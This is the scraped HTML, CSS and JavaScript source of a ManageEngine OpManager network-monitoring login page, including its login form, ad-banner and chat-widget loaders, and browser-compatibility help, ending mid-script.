#opmLogin{float:left;width:450px;height:450px;text-align:center;color:#fff;padding:0 30px;margin:auto;position:absolute;top:0;right:0;bottom:0;left:0;z-index:2} #opmLogin h2{width:100%;font:35px RobotoSlabThin;color:#7e909d;position:absolute;top:22px;left:0;z-index:1} #opmLogin h2 span{background:#65cfe6;font-size:12px;color:#d2faff;padding:2px 5px;margin:0 0 0 5px;border-radius:5px;position:absolute;bottom:5px;display:none} #opmLogin .info{width:100%;font:45px RobotoSlabThin;position:absolute;top:-100px;left:0;display:none} #opmLogin .loginField{width:450px;height:450px;margin:auto;position:absolute;top:0;left:0;transition:all .3s ease;-ms-transition:all .3s ease;-moz-transition:all .3s ease;-webkit-transition:all .3s ease;-o-transition:all .3s ease;display:block !important} #opmLogin .inputField{float:left;width:100%;text-align:center;padding:80px 30px 30px;margin:auto} #opmLogin .inputFieldRow{width:100%;height:100%;margin:auto} #opmLogin .inputFieldRow.inputFieldCol-2{width:66.6666666%} #opmLogin .inputFieldCol{float:left;width:100%;text-align:left;padding:0 50px;margin:50px 0 11px} #opmLogin .inputFieldCol > div:first-child{width:100%;margin:0 0 10px;border-bottom:1px solid #898989;position:relative} #opmLogin .inputFieldCol > div:first-child:before,#opmLogin .inputFieldCol > div:first-child:after{background:#898989;width:1px;height:5px;content:'';display:block;position:absolute;bottom:0;left:0} #opmLogin .inputFieldCol > div:first-child:after{right:0;left:auto} #opmLogin .inputFieldCol input[type=text],#opmLogin .inputFieldCol input[type=password]{width:100%;font:18px RobotoSlabLight;text-align:center;color:#000;padding:5px 12px;border:0} #opmLogin .inputFieldCol .selBox > span{background:none;min-width:200px;width:100% !important} #opmLogin .inputFieldCol .selBox > span .select2-selection__rendered{font:18px LatoLight;color:#ababab} #opmLogin .inputFieldCol .selBox > span.select2-container--focus .select2-selection__rendered,#opmLogin .inputFieldCol .selBox > span.select2-container--open .select2-selection__rendered{color:#898989} #opmLogin .inputFieldCol .selBox > span .select2-selection{background:none;border:0} #LoginDiv .select2-container .select2-dropdown{font:18px LatoLight;border-color:#898989} #opmLogin .inputFieldCol > span{float:left;font:14px LatoLight;color:#898989;cursor:pointer} #opmLogin .inputFieldCol > span + span{float:right} #opmLogin .inputFieldCol > span:hover,#opmLogin .inputFieldCol .opmCheckBox:hover{color:#000} #opmLogin .inputFieldCol .opmCheckBox{float:left;color:#898989} #opmLogin .inputFieldCol .opmCheckBox div{float:left;min-width:35px;height:20px;font:12px LatoRegular;padding:0 0 0 27px;cursor:pointer;position:relative} #opmLogin .inputFieldCol .opmCheckBox input{width:100%;height:100%;margin:0;opacity:0;filter:alpha(opcity=0);position:absolute;top:0;left:0;z-index:2;cursor:pointer} #opmLogin .inputFieldCol .opmCheckBox div label{font:14px/15px LatoLight;z-index:0} #opmLogin .inputFieldCol .opmCheckBox + span{float:right} @keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} } @-ms-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} } @-moz-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} } @-webkit-keyframes check2{ 0%{width:0;height:0} 25%{width:4px;height:0} 50%{width:4px;height:9px} } #opmLogin .inputFieldCol .opmCheckBox div label:before{background:#fff;width:15px;height:15px;content:'';border:1px solid #898989;position:absolute;top:0;left:0} #opmLogin .inputFieldCol .opmCheckBox div label:after{width:4px;height:9px;content:'';border:2px solid transparent;border-bottom:0;border-left:0;position:absolute;top:9px;left:3px;transform:scaleX(-1) rotate(135deg);-ms-transform:scaleX(-1) rotate(135deg);-moz-transform:scaleX(-1) rotate(135deg);-webkit-transform:scaleX(-1) rotate(135deg);transform-origin:left top;-ms-transform-origin:left top;-moz-transform-origin:left top;-webkit-transform-origin:left top;z-index:1} #opmLogin .inputFieldCol .opmCheckBox input:checked + label:after{border-color:#42be7f;animation:check2 .3s;-ms-animation:check2 .3s;-moz-animation:check2 .3s;-webkit-animation:check2 .3s;-o-animation:check2 .3s} #opmLogin .logInBtn{background:#e2385f;width:120px;height:auto;font:18px RobotoSlabLight;color:#fff;padding:5px 30px;margin:-6px auto 0;border:0;border-radius:4px;cursor:pointer} #opmLogin .sendBtn{background:#e2385f;width:120px;height:auto;font:18px RobotoSlabLight;color:#fff;padding:5px 30px;margin:90px auto 0;border:0;border-radius:4px;cursor:pointer} #opmLogin .loginInfoMsg{width:100%;font:14px LatoRegular;text-align:center;color:#000;position:absolute;right:0;bottom:115px;left:0} #opmLogin #loginFirst span:first-child{color:#df454e} #opmLogin #errorDiv{color:#39b54a} #opmLogin #errorMsg,#opmLogin #forgotPassStatus{color:#ff0000} .copyRights{width:100%;font:12px RobotoSlabLight;color:#fff;text-align:center;position:fixed;bottom:20px;left:0} .copyRights span{background:#000;color:#fff;padding:4px 20px 5px 20px;border-radius:4px;display:inline-block} .opmIconsHolder{width:450px;height:450px;margin:auto;border-radius:50%;position:absolute;top:0;right:0;bottom:0;left:0;transform: scale(0.95);z-index:0} .opmIcons{width:1px;height:1px;position:absolute} .opmIcons:before{background:#f5f5f7;width:1px;content:'';position:absolute;display:inline-block} .opmIcons > div{width:100px;height:100px;border:2px solid #f5f5f7;border-radius:50%;position:absolute} .opmIcons > div:before{background:#f5f5f7;width:1px;content:'';position:absolute;display:inline-block} .opmIcons > div:after{background-image:url(/apiclient/fluidicv2/img/opm-login-sprites.png);background-repeat:no-repeat;content:'';margin:auto;position:absolute;top:0;right:0;bottom:0;left:0;display:inline-block;transform:scale(.6)} .opmIcons.reportsMaps{top:-20px;right:20px} .opmIcons.reportsMaps:before{height:52px;top:47px;left:-27px;transform:rotate(45deg)} .opmIcons-reports{top:-110px;left:-80px} .opmIcons-reports:before{height:69px;top:95px;left:63px;transform:rotate(-10deg)} .opmIcons-reports:after{background-position:0 0;width:53px;height:49px} .opmIcons-maps{top:-130px;left:70px} .opmIcons-maps:before{height:139px;top:64px;left:-33px;transform:rotate(44deg)} .opmIcons-maps:after{background-position:-54px 0;width:50px;height:67px} .opmIcons.network{top:10px;right:-80px} .opmIcons-network:before{height:119px;top:40px;left:-47px;transform:rotate(64deg)} .opmIcons-network:after{background-position:-104px 0;width:67px;height:67px} .opmIcons.inventory{top:110px;right:-280px} .opmIcons-inventory:before{height:284px;top:-86px;left:-142px;transform:rotate(90deg)} .opmIcons-inventory:after{background-position:-171px 0;width:55px;height:38px} .opmIcons.workflowServer{top:190px;right:-270px} .opmIcons.workflowServer:before{height:212px;top:-69px;left:-153px;transform:rotate(90deg)} .opmIcons-workflow{top:100px;left:-130px} .opmIcons-workflow:before{height:70px;top:-67px;left:70px;transform:rotate(16deg)} .opmIcons-workflow:after{background-position:-227px 0;width:71px;height:65px} .opmIcons-server{top:125px;left:54px} .opmIcons-server:before{height:157px;top:-116px;left:-46px;transform:rotate(-48deg)} .opmIcons-server:after{background-position:-299px 0;width:37px;height:47px} .opmIcons.people{top:430px;right:-41px} .opmIcons-people:before{height:186px;top:-165px;left:-29px;transform:rotate(-34deg)} .opmIcons-people:after{background-position:-338px 0;width:99px;height:45px} .opmIcons.dashboard{top:482px;right:219px} .opmIcons.dashboard:before{height:20px;top:-77px;left:153px;transform:rotate(-35deg)} .opmIcons-dashboard{top:10px;right:-120px} .opmIcons-dashboard:before{height:100px;top:-81px;left:106px;transform:rotate(-143deg)} .opmIcons-dashboard:after{background-position:0 -69px;width:61px;height:61px} .opmIconsLeft{transform:translate(0,440px) rotate(-180deg)} .opmIconsLeft .opmIcons-reports:after{background-position:-62px -69px;width:52px;height:52px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons-maps:after{background-position:-115px -69px;width:59px;height:62px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons-network:after{background-position:-175px -62px;width:66px;height:68px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons-inventory:after{background-position:-242px -66px;width:77px;height:79px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons-workflow:after{background-position:-320px -48px;width:58px;height:76px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons-server:after{background-position:-379px -45px;width:60px;height:54px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons-people:after{background-position:-380px -101px;width:70px;height:58px;transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons.dashboard{top:482px;right:240px} .opmIconsLeft .opmIcons-dashboard:after{transform:rotate(180deg) scale(0.6)} .opmIconsLeft .opmIcons.reportsMaps:before{height:87px;top:24px;left:-50px;transform:rotate(73deg)} .opmIconsLeft .opmIcons.reportsMaps{top:-20px;right:-40px} .opmIconsRight .opmIcons-dashboard{top:-11px;right:-120px} .opmIconsRight .opmIcons.dashboard:before{height:26px;top:-105px;left:21px;transform:rotate(-76deg)} .opmIconsRight .opmIcons-dashboard:before{height:87px;top:-84px;left:27px;transform:rotate(-203deg)} .opmIconsRight .opmIcons.dashboard{top:481px;right:61px} .opmIconsRight .opmIcons.people{top:490px;right:-121px} .opmIconsRight .opmIcons-people:before{height:199px;top:-138px;left:-72px;transform:rotate(-52deg)} .opmIconsRight .opmIcons-workflow{top:120px;left:-180px} .opmIconsRight .opmIcons-workflow:before{height:104px;top:-42px;left:-47px;transform:rotate(110deg)} #opmLogin #forgotPasswordDiv .inputField{padding:140px 30px 30px} #opmLogin #forgotPasswordDiv{left:100%} .opmLoginFieldHolder{width:450px;height:450px;margin:auto;border-radius:50%;position:absolute;top:0;right:0;bottom:0;left:0;overflow:hidden} #LoginDiv.domainField:before{width:500px;height:500px} #LoginDiv.domainField .opmIconsHolder,#LoginDiv.domainField #opmLogin{width:500px;height:500px} #LoginDiv.domainField .loginField{width:100%;height:100%} #LoginDiv.domainField #opmLogin h2{top:24px} #LoginDiv.domainField #authenticationDiv .inputFieldCol{padding:0 30px;margin:20px 0 10px} #LoginDiv.domainField #authenticationDiv .logInBtn{margin:6px auto 0} #LoginDiv.domainField #forgotPasswordDiv .inputFieldCol{padding:0 30px} #LoginDiv.domainField #forgotPasswordDiv .sendBtn{margin:123px auto 0} #LoginDiv.domainField .opmIcons.dashboard:before{height:20px;top:-51px;left:152px;transform:rotate(-35deg)} #LoginDiv.domainField .opmIcons-dashboard:before{height:80px;top:-56px;left:108px;transform:rotate(-136deg)} #LoginDiv.domainField .opmIcons.dashboard{top:518px;right:260px} #LoginDiv.domainField .opmIconsRight .opmIcons.dashboard{top:481px !important;right:61px !important} #LoginDiv.domainField .opmIconsRight .opmIcons.dashboard:before{height:64px;top:-51px;left:12px;transform:rotate(-50deg)} #LoginDiv.domainField .opmIconsRight .opmIcons-dashboard:before{height:0} #LoginDiv.domainField .opmIconsLeft .opmIcons.dashboard{top:465px} #LoginDiv.domainField .loginInfoMsg{width:100%;font:14px LatoRegular;text-align:center;color:#000;position:absolute;right:0;bottom:120px;left:0} #opmLogin h2.ncmLoginTxt{font-size:30px} #opmLogin h2.nfaLoginTxt{font-size:30px;top:32px} .opmLoginSkip{font:12px LatoLight;color:#ababab;margin:10px 0 0} .opmLoginSkip i{font-style:normal} .opmLoginSkip div{display:inline-block;cursor:pointer} .opmLoginSkip div:hover{color:#898989} .loginCredentialInfo{background:#fdf79f;color:#000 !important;padding:3px 8px;margin:0 0 -6px;border-radius:4px;position:relative} .circle{background:radial-gradient(ellipse at center, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -moz-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background:-webkit-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -o-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);background: -ms-radial-gradient(center, ellipse cover, rgba(255,255,255,.3) 0%, rgba(0,0,0,.1) 100%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#ffffff', endColorstr='#000000',GradientType=1 );width:100%;height:100%;margin:auto;position:absolute;top:0;right:0;bottom:0;left:0} .appDownloadBtn{width:300px;height:25px;text-align:center;margin:auto;position:absolute;right:0;bottom:-67px;left:0} .appDownloadBtn a{background:url(/apiclient/fluidicv2/img/opm-login-sprites.png) no-repeat 0 0;width:90px;height:25px;margin:0 3px;display:inline-block} .appDownloadBtn a.icon-iphone{background-position:0 -160px} .appDownloadBtn a.icon-ipad{background-position:-91px -160px} .appDownloadBtn a.icon-android{background-position:-182px -160px} .eventbanner{max-width:1230px;margin:auto;position:fixed;top:0;right:20px;left:20px;z-index:1} .eventbanner a{float:left;width:100%} .eventbanner img{width:100%;height:auto} .eventContent{background:#000;float:left;width:100%;height:auto;font:14px LatoRegular;color:#fff;padding:20px} .eventContent a{float:none;width:auto;color:#31A5F0;text-decoration:none;display:inline} .eventContent a:hover{text-decoration:underline} .opm-closeAd{background:#fa5b5a;width:26px;height:26px;border-radius:50%;display:inline-block;position:absolute;top:3px;right:3px;cursor:pointer;transition:all .3s ease;-ms-transition:all .3s ease;-moz-transition:all .3s ease;-webkit-transition:all .3s ease;-o-transition:all .3s ease} .opm-closeAd:before,.opm-closeAd:after{background:#fff;width:1px;height:14px;content:'';margin:auto;display:block;position:absolute;top:0;right:0;bottom:0;left:0;transform:rotate(45deg)} .opm-closeAd:after{transform:rotate(135deg)} .loginBgCustomized .opmIconsHolder,.loginBgCustomized .appDownloadBtn{display:none} @media only screen and (max-height:939px){ .opmIconsHolder{transform:scale(.9)} #LoginDiv,.eventbanner{transform:scale(.95)} #opmLogin .inputFieldCol > span,.opmLoginSkip{font-size:14px} #opmLogin .inputFieldCol .opmCheckBox div label{font:14px/15px LatoLight} body.MacOS #LoginDiv,body.MacOS .eventbanner{transform:scale(.8)} } @media only screen and (max-height:700px){ body:not(.loginBgCustomized) #LoginDiv{transform:scale(.8)} } .ie-compatibility{background:#fff;text-align:center;position:absolute;top:0;right:0;bottom:0;left:0;overflow:auto} .ie-compatibility .settingsContent{width:870px;text-align:left;margin:50px auto;display:inline-block} .ie-compatibility .settingsContent .header,.ie-compatibility .content{float:left;width:100%;height:auto} .opm-logo{width:213px;height:79px;display:block} h2{font:23px RobotoSlabLight;color:#f90505;margin:15px 0 15px} .ie-compatibility .content > div{background:#fff;float:left;width:100%;padding:25px;margin:12px 0;border:1px solid #eaeaea;border-radius:3px;box-shadow:0 1px 4px 0 rgba(0,0,0,.1)} h4{font:16px LatoBold;color:#4e4e4e;margin:0 0 8px;position:relative} h4 .info{font:16px LatoRegular;color:#696969} ul{list-style:disc inside} li{font:16px/25px LatoRegular;color:#696969} .part1,.part2{min-height:90px;padding:40px 25px 25px 180px !important;position:relative} body.ie7 .part1,body.ie7 .part2{width:845px !important} .part1{padding:40px 25px 25px 80px !important} .part1 img,.part2 img{display:block;position:absolute;top:30px;left:45px} .part2 h4{font:35px RobotoSlabThin;color:#1876d7} .part2 li{line-height:33px} .part3{padding:40px 25px 40px 55px !important} .part3 h4{margin:0 0 30px} .part3 > div{float:left;padding:20px 0 0 50px;margin:0 100px 0 0;position:relative;display:inline-block} .part3 img{width:33px;height:34px;display:block;position:absolute;top:0;left:0} .part3 > div.unable2StartEmail img{background-position:-277px -791px;width:42px;height:42px} .part3 > div > *{display:block} .part3 > div > b{font:14px LatoBold;color:#545454;position:absolute;top:0;left:50px} .part3 > div > span{font:16px LatoRegular;color:#4e4e4e} .part3 > div.unable2StartEmail b{top:2px} .part3 > div.unable2StartEmail{padding:22px 0 0 50px} .part3 > div.unable2StartEmail > span{color:#2f45a6} .ie_issue,.ie_solution{position:absolute !important;top:0 !important;left:-30px !important} #LoginDiv.showErrorMs #opmLogin h2{margin:30px 0 15px} #LoginDiv.showErrorMs #opmLogin .inputField {padding:95px 30px 30px} #LoginDiv.showErrorMs #opmLogin .inputFieldCol{margin:25px 0 0px} #LoginDiv.showErrorMs #opmLogin .logInBtn{margin:65px auto 0} #LoginDiv.showErrorMs #opmLogin .loginInfoMsg{width:70%;left:15%} #LoginDiv.showErrorMs.domainField h2{margin:30px 0 15px} #LoginDiv.showErrorMs.domainField .inputField {padding:70px 30px 30px} #LoginDiv.showErrorMs.domainField .inputFieldCol{margin:20px 0 0px} #LoginDiv.showErrorMs.domainField .logInBtn{margin:36px auto 0} #LoginDiv.showErrorMs.domainField .loginInfoMsg{width:70%;left:15%;bottom:100px} #LoginDiv.showErrorMs.domainField #opmLogin .inputField {padding:70px 30px 30px} #LoginDiv.showErrorMs.domainField .loginInfoMsg{width:70%;left:15%;bottom:115px} #LoginDiv.showErrorMs.domainField #authenticationDiv .logInBtn{margin:40px auto 0} /* login page styles ends ----------> */ </style> </head> <script> function closeAdBanner() { if(loginAdID!==undefined){ $.ajax({ url: "/servlets/SettingsServlet?DISABLE_CURRENT_AD="+loginAdID+"&sid="+Math.random(),//No I18N type: "POST",//No I18N dataType: "html",//No I18N success: function(response){ $('.eventbanner').hide(); } }); } } function redirectAdBanner() { if(hyperLink!=undefined){ window.open(hyperLink,'_blank'); } } function loadAdBanner(userCountryName) { var url = "/servlets/SettingsServlet?"; //No I18N var dataParams="GetLoginAd="+userCountryName+"&cookieUpdate=true&cookieName=CountryName&cookieValue="+userCountryName+"&cookieExpiry=30"; //No I18N $.ajax({ url: url, type: "POST",//No I18N dataType: 'json',//No I18N async: true, data:dataParams, success: function(jsonData) { adPath=jsonData.adPath; adText=jsonData.adText; hyperLink=jsonData.hyperLink; loginAdID=jsonData.loginAdID; if(adPath!==undefined){ $("#adImageDiv").show(); $("#adImagePath").attr("src",adPath); //No I18N }else if(adText!==undefined){ $("#adTextDiv").show(); $("#adTextDiv .eventContent").text(adText); } } }); } function checkLoginCustomized() { var loginBgValue = "false"; if(loginBgValue!=="null" && loginBgValue!=="false") { $('body').addClass('loginBgCustomized'); if(loginBgValue === "customColor") { $('body').css({'background':'#'});//No I18N } else { $('body').css({'background':"url(/apiclient/fluidicv2/img/login/login-bg.png?"+Math.random()+") no-repeat center/100%"});//No I18N } } var showCopyRight = "on"; if(showCopyRight==="off"){ $(".copyRights").css({'display':'none'});//No I18N } } </script> <!--body class="loginBody1" onload="javascript:loadCredentialsFromCookie(); userType();"--> <body> <!--Start Login Main Div--> <form id="form1" name="loginForm" METHOD=post action='j_security_check;jsessionid=E3F79E8675738CB73D8F6F346C24B664' autocomplete="off" onSubmit="return loginSubmit();" > <input id="authRuleName" type="hidden" name="AUTHRULE_NAME" value="Authenticator"/> <input type="hidden" name="clienttype" value="html"> <input type="hidden" name="ScreenWidth"> <input type="hidden" name="ScreenHeight"> <input type="hidden" name="loginFromCookieData"> <input type="hidden" id="ntlmv2" name="ntlmv2" value="false"> <input type="hidden" id="domainNameDiv"> <!--Start Login Box--> <div class='circle'></div> <div class='eventbanner' id='adImageDiv' style='display:none'> <a onclick="redirectAdBanner()" target="_blank" style="cursor:pointer;"><img id='adImagePath' src='' alt='banner'></a> <i class='opm-closeAd' onclick='closeAdBanner();'></i> </div> <div class='eventbanner' id='adTextDiv' style='display:none'> <div onclick="redirectAdBanner()" class='eventContent' style="cursor:pointer;"></div> <i class='opm-closeAd' onclick='closeAdBanner();'></i> </div> <script> var userCountryName="ALL"; //No I18N var $zoho=$zoho || {}; $zoho.salesiq = $zoho.salesiq || {widgetcode:"dfffdb755e785782bec7a76eb4ff95bd57c72617aa8faf11cd82ea2cc4884740",values:{}, //No I18N ready:function(embedinfo) { $zoho.salesiq.floatbutton.visible("hide"); //No I18N $zoho.salesiq.visitor.getGeoDetails(); } }; var d=document; s=d.createElement("script"); s.type="text/javascript"; s.id="zsiqscript"; s.defer=true; s.src="https://salesiq.zoho.com/widget"; t=d.getElementsByTagName("script")[0]; t.parentNode.insertBefore(s,t); d.write("<div id='zsiqwidget'></div>"); $zoho.salesiq.afterReady = function(info) { userCountryName=info.Country; loadAdBanner(userCountryName); } </script> <div id="LoginDiv"> <div class='opmIconsHolder'> <div class='opmIconsRight'> <div class='opmIcons reportsMaps'> <div class='opmIcons-reports'></div> <div class='opmIcons-maps'></div> </div> <div class='opmIcons network'> <div class='opmIcons-network'></div> </div> <div class='opmIcons inventory'> <div class='opmIcons-inventory'></div> </div> <div class='opmIcons workflowServer'> <div class='opmIcons-workflow'></div> <div class='opmIcons-server'></div> </div> <div class='opmIcons people'> <div class='opmIcons-people'></div> </div> <div class='opmIcons dashboard'> <div class='opmIcons-dashboard'></div> </div> </div> <div class='opmIconsLeft'> <div class='opmIcons reportsMaps'> <div class='opmIcons-reports'></div> <div class='opmIcons-maps'></div> </div> <div class='opmIcons network'> <div class='opmIcons-network'></div> </div> <div class='opmIcons inventory'> <div class='opmIcons-inventory'></div> </div> <div class='opmIcons workflowServer'> <div class='opmIcons-workflow'></div> <div class='opmIcons-server'></div> </div> <div class='opmIcons people'> <div class='opmIcons-people'></div> </div> <div class='opmIcons dashboard'> <div class='opmIcons-dashboard'></div> </div> </div> </div> <div id='opmLogin'> <h2>OpManager<span>v 12.0</span></h2> <div class='info'>The Complete Network Monitoring Software</div> <div class='opmLoginFieldHolder'> <!--Start authenticationDiv Box--> <div class='loginField' id="authenticationDiv" style='display:block;'> <div class='inputField'> <div class='inputFieldRow opmLoginField'> <div class='inputFieldCol'> <div><input type='text' name='j_username' placeholder='User Name' id='userName' tabindex='1' /></div> <span> </span> </div> <div class='inputFieldCol'> <div><input id="password" type="password" placeholder='Password' name='j_password' tabindex='1'/></div> <div class='opmCheckBox'> <div> <input name="signInAutomatically" id="StayIn" type="checkbox"> <label>Keep me signed in</label> </div> </div> <span onclick="javascript:showForgotPassword(),forgetPass();" >Forgot Password</span> </div> </div> </div> <input id="btnSubmit" type="submit" class="logInBtn" value="Login"> </div> <!--End authenticationDiv Box--> <div class='loginField forgotPasswordField' id="forgotPasswordDiv" style='display:none;'> <div class='inputField'> <div class='inputFieldRow'> <div class='inputFieldCol'> <div> <input name="uname" id="uname" placeholder='User Name' type="text" class="loginFont pwdField" tabindex='-1'/> </div> <span onclick="javascript:returnLogin();" >Back to Login</span> </div> <input id="btnSubmit" type="button" class="sendBtn" value="Send" onclick="javascript:generatePwd();" tabindex='-1'> </div> </div> </div> </div> <div class='loginInfoMsg'> <div style="display:none;" id="loginFirst"> <span>Note - </span> <span>User Name & Password : admin <span> </div> <div id="forgotPassStatus"> </div> <div id="mailErrorDiv" ></div> <div id="ie6_statusmsg"> webclient.common.login.ie webclient.common.login.version </div> </div> <div class='appDownloadBtn'> <a href='https://itunes.apple.com/in/app/opmanager/id561926637?mt=8' target='_blank' class='icon-iphone'></a> <a href='https://play.google.com/store/apps/details?id=com.manageengine.opm&hl=en' target='_blank' class='icon-android'></a> </div> </div> </div> <div class='copyRights'><span>The Complete Network Monitoring Software from ManageEngine. Copyright @ 2019 ZOHO Corp., All rights reserved.</span></div> </form> <script> checkLoginCustomized(); </script> <div id='browserNotSupportDiv' style='display:none'> <div class='ie-compatibility'> <div class='settingsContent'> <div class='header'> <img src='/apiclient/fluidicv2/img/opmlogo.png' class='opm-logo'></img> <h2>Problem in loading OpManager GUI with Internet Explorer.</h2> </div> <div class='content'> <div class='part1'> <h4 class='browserNotSupportClass'><img src='/apiclient/fluidicv2/img/ie_issue.png' class='ie_issue' /> Issue: <span class='info'>Your browser version is outdated.</span></h4> <h4 class='compatibilityModeClass'><img src='/apiclient/fluidicv2/img/ie_issue.png' class='ie_issue' /> Issue: <span class='info'>Your Internet Explorer is running in compatibility mode 9 or below.</span></h4> <h4 class='browserNotSupportClass' style='margin-top:25px'><img src='/apiclient/fluidicv2/img/ie_solution.png' class='ie_solution' /> Solution: <span class='info'>OpManager only supports Internet Explorer version 10 and above. Kindly update your browser.</span></h4> <h4 class='compatibilityModeClass' style='margin-top:25px'><img src='/apiclient/fluidicv2/img/ie_solution.png' class='ie_solution' /> Steps to resolve this issue:</h4> <ul> <li class='compatibilityModeClass'>In Internet Explorer, select '<b>Tools</b>' from the menu or click on the '<b>Tools</b>' icon.</li> <li class='compatibilityModeClass'>Select '<b>Compatibility View settings</b>'.</li> <li class='compatibilityModeClass'>Uncheck '<b>Display intranet sites in Compatibility View</b>' option.</li> </ul> </div> <div class='part3'> <h4>Please contact support for further assistance.</h4> <div class='unable2StartPhone'> <img src='/apiclient/fluidicv2/img/phone.png'> <b>Phone:</b> <span>044-67447070 / 71817070</span> </div> <div class='unable2StartEmail'> <img src='/apiclient/fluidicv2/img/mail.png'> <b>Email:</b> <span>opmanager-support@manageengine.com</span> </div> </div> </div> </div> </div> </div> </body> <script LANGUAGE="JavaScript"> ntlmAuth(); function ntlmAuth() { if(ntlm) { document.loginForm.ntlmv2.value = "true"; document.loginForm.j_username.value = ntlmuser; document.loginForm.submit(); } } function selectADLogin() { document.loginForm.AUTHRULE_NAME.value="ADAuthenticator"; //No I18N $('#domainNameDiv').attr({ name:'domainName', //No I18N value:document.loginForm.domainNameAD.value }); } function selectLocalLogin() { //var placeholder = document.loginForm.domainNameAD.value; if(document.loginForm.domainNameAD === undefined || document.loginForm.domainNameAD.value === undefined || document.loginForm.domainNameAD.value === "Authenticator") { document.loginForm.AUTHRULE_NAME.value="Authenticator"; //No I18N $('#domainNameDiv').removeAttr('name value'); //No I18N // placeholder ="Local Authentication"; } else if(document.loginForm.domainNameAD.value == "radiusUserLogin") { document.loginForm.AUTHRULE_NAME.value="RadiusAuthenticator"; //No I18N // placeholder ='Radius Authentication'; $('#domainNameDiv').removeAttr('name value'); //No I18N } else { selectADLogin(); } // placeholder = placeholder+' '+'User Name'; //$('#userName').attr('placeholder',placeholder);//No I18N } detectOSnBrowser(); function detectOSnBrowser(){ var OSName='unkown_OS';//No I18N if(navigator.appVersion.indexOf('Win')!=-1){OSName='Windows';}//No I18N if(navigator.appVersion.indexOf('Mac')!=-1){OSName='MacOS';}//No I18N if(navigator.appVersion.indexOf('X11')!=-1){OSName='UNIX';}//No I18N if(navigator.appVersion.indexOf('Linux')!=-1){OSName='Linux';}//No I18N $('body').addClass(OSName); var browserName='unkown_Browser';//No I18N if(/Chrome/.test(navigator.userAgent) && /Google Inc/.test(navigator.vendor)){browserName='chrome';}//No I18N if(/Safari/.test(navigator.userAgent) && /Apple Computer/.test(navigator.vendor)){browserName='safari';}//No I18N if(navigator.userAgent.indexOf('Opera')!=-1){browserName='opera';}//No I18N if(navigator.userAgent.indexOf('Firefox')!=-1){browserName='firefox';}//No I18N if((navigator.userAgent.indexOf('MSIE')!=-1)||(!!document.documentMode==true)){browserName='ie';}//No I18N $('body').addClass(browserName); if(navigator.userAgent.match(/Trident.*rv:11\./)){$('body').addClass('ie11');}//No I18N } WindowHtWd(); function WindowHtWd(){ var wHt=$(window).height(); if(wHt<='939' && $('.eventbanner').offset()!==undefined){ var topPos='-'+$('.eventbanner').offset().top+'px';//No I18N $('.eventbanner').css({top:topPos}); } } </script> </html> <script type="text/javascript"> //ignorei18n_start $(document).ready(function() { if($('#domainDiv').length==1){ $('#LoginDiv').addClass('domainField'); } $('.select2').select2({minimumResultsForSearch:-1}); var ieDetails = IeVersionCheck(); if (ieDetails.IsIE && ieDetails.TrueVersion < 10) { if(ieDetails.TrueVersion <= 7) { $('body').addClass('ie7'); } doIEHandling(true); } else if (ieDetails.IsIE && ieDetails.CompatibilityMode && ieDetails.ActingVersion < 10) { doIEHandling(true, true); if(ieDetails.ActingVersion <= 7) { $('body').addClass('ie7'); } } else { doIEHandling(false); var loginAdsContent = ""; var loginPagingContent="" var cnt=1; var scrWidth = 0; var play; var language = ""; language = ''; //collect images path from ZOHO Creator /* var scrWidth = document.body.scrollWidth; if(scrWidth < 1400) document.body.className = "loginBody2" // $('#btnSubmit').click(function() { // loginSubmit(); // }); $('div.sliderClosebt').hover( function () { $(this).show(); $('div.sliderClosebtTxt').show(); }, function () { } ); $('div.sliderClosebtTxt').hover( function () { $(this).show(); $('div.sliderClosebt').show(); }, function () { } ); $('div.sliderClosebt.selected').hover( function () { $(this).show(); $('div.sliderClosebt').show(); }, function () { } ); $('#folio_block').hover( function () { $('div.sliderClosebt').show(); $('div.sliderClosebtTxt').show(); }, function () { $('div.sliderClosebt').hide(); $('div.sliderClosebtTxt').hide(); } ); $('#opmDftLogo1').hover( function () { if(cnt>1) { $('div.sliderClosebt').show(); $('div.sliderClosebtTxt').show(); } }, function () { if(cnt>1) { $('div.sliderClosebt').hide(); $('div.sliderClosebtTxt').hide(); } } ); jQuery('div.folio_block').hoverIntent({ over: makeCloseBtShow, timeout: 500, out: makeCloseBtHide }); */ loadCredentialsFromCookie(); //userType(); //Message box show and hide // $('.loginCloseicon').click(function(){ // $(".loginMsgBox").slideUp(400); // }); /* $('#frmTleRightlinksclick').click(function(){ $(".loginMsgBox").slideDown(400); $("#errorDiv").hide(); });*/ $('#frmTleRightlinksclick').click(function(){ $("#loginFirst").slideDown(1000); $("#userName").val("admin"); $("#password").val("admin"); $("select[name=domainNameAD]").val("NULL"); $("input[name=authType]").val("localUserLogin"); $("#errorDiv").hide(); /* document.getElementById('password').type = 'password'; setOpacityInputPwd(); setOpacityInputUser();*/ }); } /*var default_Domain = '';//No I18N $('#authenticationDiv select[name="domainNameAD"]').select2().val(default_Domain)//.trigger('change'); //No I18N $('#authenticationDiv select[name="domainNameAD"]').select2(); */ }); //Start Slider close button show hide function makeCloseBtShow() { $("#sliderClosebt").show(); } function makeCloseBtHide() { $("#sliderClosebt").hide(); } // Start Close Slider Image function closeSliderImage() { if ($("#folio_block").css('display') == 'block') { clearInterval(play); //Stop the rotation $("#opmDftLogo1").show(); $("#folio_block").hide(); $('.loginPaging').hide(); //$('#sliderClosebt').hide(); //$('div.hdrMnuUnSelectBG.selected').removeClass('selected');//No I18N $('div.sliderClosebt').addClass('selected'); //No I18N 